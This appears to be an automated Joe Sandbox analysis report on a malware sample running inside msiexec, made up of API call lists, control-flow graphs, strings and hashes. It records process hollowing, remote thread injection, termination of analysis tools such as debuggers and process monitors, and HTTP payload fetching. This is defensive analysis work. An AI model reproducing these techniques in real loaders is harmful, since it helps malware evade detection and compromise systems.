control_flow_graph 332 7ff6345c24cc-7ff6345c2546 GetModuleFileNameW 333 7ff6345c2548 332->333 334 7ff6345c254d-7ff6345c2589 332->334 335 7ff6345c2df1-7ff6345c2df9 333->335 336 7ff6345c25a1-7ff6345c25bd call 7ff6345c240c 334->336 337 7ff6345c258b-7ff6345c2593 334->337 345 7ff6345c2600-7ff6345c260a 336->345 338 7ff6345c25bf-7ff6345c25db call 7ff6345c244c 337->338 339 7ff6345c2595-7ff6345c259d 337->339 338->345 342 7ff6345c259f-7ff6345c25fb 339->342 343 7ff6345c25dd-7ff6345c25f9 call 7ff6345c248c 339->343 342->335 343->345 350 7ff6345c2611-7ff6345c2665 CreateProcessW 345->350 351 7ff6345c260c 345->351 352 7ff6345c2667 350->352 353 7ff6345c266c-7ff6345c26ac 350->353 351->335 352->335 355 7ff6345c26ae 353->355 356 7ff6345c26b3-7ff6345c26cf GetFileSize 353->356 355->335 357 7ff6345c26d1-7ff6345c26d9 356->357 358 7ff6345c26db-7ff6345c26e6 CloseHandle 356->358 357->358 359 7ff6345c26eb-7ff6345c2713 VirtualAlloc 357->359 358->335 360 7ff6345c2725-7ff6345c2750 ReadFile 359->360 361 7ff6345c2715-7ff6345c2720 CloseHandle 359->361 362 7ff6345c2775-7ff6345c27c3 CloseHandle GetThreadContext 360->362 363 7ff6345c2752-7ff6345c2770 VirtualFree CloseHandle 360->363 361->335 364 7ff6345c27c5-7ff6345c27d8 VirtualFree 362->364 365 7ff6345c27dd-7ff6345c2862 ReadProcessMemory GetModuleHandleA GetProcAddress 362->365 363->335 364->335 367 7ff6345c2864-7ff6345c2877 VirtualFree 365->367 368 7ff6345c287c-7ff6345c28e5 VirtualAllocEx 365->368 367->335 369 7ff6345c28ff-7ff6345c2933 WriteProcessMemory 368->369 370 7ff6345c28e7-7ff6345c28fa VirtualFree 368->370 371 7ff6345c2935-7ff6345c2948 VirtualFree 369->371 372 7ff6345c294d-7ff6345c2958 369->372 370->335 371->335 373 7ff6345c296a-7ff6345c297d 372->373 374 7ff6345c2983-7ff6345c2a0c WriteProcessMemory 373->374 375 7ff6345c2a2b-7ff6345c2a72 373->375 376 7ff6345c2a0e-7ff6345c2a21 VirtualFree 374->376 377 7ff6345c2a26 374->377 378 7ff6345c2a84-7ff6345c2a97 375->378 376->335 377->373 380 7ff6345c2a9d-7ff6345c2aec RtlCompareMemory 378->380 381 7ff6345c2d1c-7ff6345c2da0 WriteProcessMemory SetThreadContext 378->381 382 7ff6345c2af0-7ff6345c2b19 380->382 383 7ff6345c2aee 380->383 384 7ff6345c2da2-7ff6345c2db5 VirtualFree 381->384 385 7ff6345c2db7-7ff6345c2dc7 ResumeThread 381->385 387 7ff6345c2b24-7ff6345c2b32 382->387 383->378 384->335 388 7ff6345c2dde-7ff6345c2deb VirtualFree 385->388 389 7ff6345c2dc9-7ff6345c2ddc VirtualFree 385->389 390 7ff6345c2b38-7ff6345c2bc3 387->390 391 7ff6345c2d17 387->391 388->335 389->335 392 7ff6345c2bd5-7ff6345c2be3 390->392 391->381 393 7ff6345c2d12 392->393 394 7ff6345c2be9-7ff6345c2c1c 392->394 393->387 395 7ff6345c2c20-7ff6345c2cf3 ReadProcessMemory WriteProcessMemory 394->395 396 7ff6345c2c1e 394->396 398 7ff6345c2cf5-7ff6345c2d08 VirtualFree 395->398 399 7ff6345c2d0d 395->399 396->392 398->335 399->393
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: FileModuleName
• String ID: .reloc$@$NtUnmapViewOfSection$ntdll
• API String ID: 514040917-3001742581

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: OpenProcess
• String ID: $@$RtlCreateUserThread$ntdll
• API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 951007d672d3651b68ace71befb7ddbf8e2c993ad6dbee713dd0779f17d06713
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D171C832D0CA8586E7609B55E48476AF7A0FB847A4F504135D6CDC6B98DF7CD888DF40

APIs
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6345C219D
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
Similarity
• API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3

APIs
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
Similarity
• API ID: Heap$AllocateCloseFileHandleProcessSize
• String ID:

APIs
  • Part of subcall function 00007FF6345C4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C30A7), ref: 00007FF6345C4494
  • Part of subcall function 00007FF6345C3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6345C3BFC
  • Part of subcall function 00007FF6345C3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6345C3DF7
  • Part of subcall function 00007FF6345C3DE4: Process32FirstW.KERNEL32 ref: 00007FF6345C3E2A
  • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3E3C
  • Part of subcall function 00007FF6345C3DE4: wcscmp.MSVCRT ref: 00007FF6345C3E51
  • Part of subcall function 00007FF6345C3DE4: OpenProcess.KERNEL32 ref: 00007FF6345C3E67
  • Part of subcall function 00007FF6345C3DE4: TerminateProcess.KERNEL32 ref: 00007FF6345C3E8A
  • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3E98
  • Part of subcall function 00007FF6345C3DE4: Process32NextW.KERNEL32 ref: 00007FF6345C3EAB
  • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3EBD
• Sleep.KERNEL32 ref: 00007FF6345C3156
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
Similarity
• API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
• String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
Similarity
• API ID: Mutex$CloseHandleRelease$CreateErrorLast
• String ID: rbNSpGEsyb

APIs
  • Part of subcall function 00007FF6345C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6345C3744
  • Part of subcall function 00007FF6345C3704: GetVolumeInformationW.KERNEL32 ref: 00007FF6345C37C1
  • Part of subcall function 00007FF6345C3704: wsprintfW.USER32 ref: 00007FF6345C3862
• SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38CD
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38E2
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38F5
• CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3905
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C392D
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3940
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3955
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 943468954-4119554291
                                                                                                                                                                                                                        • Opcode ID: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction ID: dcb135a981eaf403d8143dc114d857b6844a5ef488451b1bd7833ac22261e18c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2113335E2898685DB60DF25F8A476AA361FBC4B55F406031DA4EC3B29DF3CD908D784

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: 3ebe4391cd08728424858948bffff835260f3074f86b4951e283ac16297ffa04
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221CF31E0CA86C1E7709B11E8C836AE3A1FBD4B65F005234C65DC26A8DF3DD845EB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: d4b22c4b82d73bb1d5b30fb9c8e4ac22bbbf6050fdb273947db342ce2336bcde
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99019A26D1CA46C2E7209B21EC9423DA770FBD8B66F401535E98EC6774CF3CD944D640
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: 499dc928367373acd15941bc3bfa0afc729f88dd90bd380e4b5ccb735ceb6a2b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A031D676A1CAC595D7709B19E4D83AAB3A1FB98790F000225DA8EC3B68DF3CD954DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 7f76c7b2328b5cd59b6a9a790ef062e636cc5b07ec7bbe68fd715686a889c5a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0001D662D0865686E6708F51E4C832AA7A0FB84369F905135D68EC67A4DF7CDA49DF00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 3b73426cc70003b2fccdc483a1811287ae091c705d4f42d5ec36f8b90dc8f445
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7311FE71E0CA8681E7708B11E8C836AA3A0FB84765F005235D6AEC6798DF3DD904EB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: f25616f13cfec169680b56eb4c09484f5cf1bff49f332aac719c57b792230a5c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231F426A1C6C586DB30DB64E4983AAB3A0FB94714F401136E68DC7B98EF7DC949DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 66ba3de4ad81a386b284ec76ae5237acc86e995a8c30c9d1c567e2ba3426b84d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3E0ED21D19A96C2D7649F50F894329A3A0FB84765F900130D58DD2764DF3CD959DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C10D8: OpenProcess.KERNEL32 ref: 00007FF6345C10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6345C2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6345C2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$HeapProcess$CreateDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 3579246950-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: 868d17a59729a8917b8620ec3e2ada0c6119cde91c1ab122a96e87b8126a43a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8611E874E19A8286E720DB10F8C83AAB3A0FF8476AF400535D54DC6765DF7CE949EB40

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0.6%
                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                        Total number of Limit Nodes:31
